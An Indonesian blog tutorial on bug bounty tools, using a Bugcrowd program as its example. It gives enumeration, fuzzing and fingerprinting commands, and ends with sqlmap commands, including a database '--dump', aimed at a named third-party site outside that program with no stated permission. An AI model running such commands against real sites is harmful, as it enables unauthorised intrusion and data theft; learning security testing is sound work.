Essential & Favorite Bug Bounty Hunting Tools

Salah satu website untuk mencari program bug hunting adalah bugcrowd,kalian harus login dulu menjadi member untuk bisa melihat program yang tersedia.

Banyak program yang tersedia di bugcrowd,sebagai contoh saya menggambil program lamoda. kalian bisa melihat tabel target dan detailnya di sana.sebagai contoh disini lamoda menyediakan scope target sebagai berikut:

In Scope Targets



https://www.lamoda.ru
https://api.lamoda.ru
http://photouploader.lamoda.ru/

Artinya kita hanya bisa mengeksekusi target yang ada di tabel tersebut. Ada juga out scope target,sebagai berikut:

Out-of-Scope

    Denial of Service attacks
	Use of outdated software/library versions
    Use of a known-vulnerable library without a description of an exploit specific to our implementation
    Login/logout/unauthenticated/low-impact CSRF
    Cookies that lack HTTP Only or Secure settings for non-sensitive data
    Self-XSS and issues exploitable only through Self-XSS
    Reports from automated tools or scans
    Attacks requiring physical access to a user's device or MITM attacks
    Username enumeration based on login, forgot password, account creation and registration pages
    Enforcement policies for brute force or account lockout
    Reports about insecure SSL / TLS configuration
    Clickjacking and issues only exploitable through clickjacking
    Mail configuration issues including SPF, DKIM, DMARC settings
    Rate-limiting issues
    Hyperlink injection in emails using forms available to any user
    Vulnerabilities affecting users of outdated browsers or platforms
    Reports of credentials exposed by other data breaches / known credential lists

Artinya kita tidak di izinkan untuk mengeksekusi itu.
Langsung saja kita coba eksekusi dengan tools sublist3r,sublist3r ini tools yang digunakan untuk mengeksplorasi subdomain yang ada.

download:

	apt-get install sublist3r
jalankan perintah berilkut:

sublister -d lamoda.ru
kalau ada error dibiarkan saja dan tunggu sampai hasilnya keluar.

output:



[-] Total Unique Subdomains Found: 104
www.lamoda.ru
abcmedia.lamoda.ru
admin.lamoda.ru
www.admin.lamoda.ru
affiliates.lamoda.ru
affiliates-kz.lamoda.ru
ap.lamoda.ru
api.lamoda.ru
www.api.lamoda.ru
apigw.lamoda.ru
www.apigw.lamoda.ru
apimgmt-dev.lamoda.ru
apimgmt-prod.lamoda.ru
www.apimgmt-prod.lamoda.ru
app.lamoda.ru
....
....

Terlihat kita mendapat total 104 domain,anda bisa simpan ke dalam file txt. Hasil output tersebut bisa menjadi target kita selanjutnya.
Selain tools sublist3r ada juga beberrapa tools lainnya yang digunakan untuk mencari subdomain.

-sublist3r
#sublister -d lamoda.ru

-knockpy
#./knock.py lamoda.ru

-assetfinder
#./assetfinder -subs-only lamoda.ru
atau
echo "lamoda.ru" | assetfinder -subs-only | tee -a domain.txt

-ammas
#ammas enum -d lamoda.ru

-DirBuster
#dirb https://www.lamoda.ru

-wfuzz
#wfuzz -w /root/tools/pass.txt http://testphp.vulnhub.com/FUZZ

-whatweb
#whatweb https://www.lamoda.ru

-Spiderfoot
#python sf.py

scanning SQL
-scanQli
#pyhon scanqli.py -u 'https://www.asfaa.org/members.php?id=4'

Eksploit SQL
-SQLMap
#sqlmap -u 'https://www.asfaa.org/members.php?id=4'

ekatrak hasil SQL nya
#sqlmap -u 'https://www.asfaa.org/members.php?id=4' --dump

Aigore

Tujuan saya buat blog ini adalah untuk sharing sekaligus belajar.

Posting Komentar

Lebih baru Lebih lama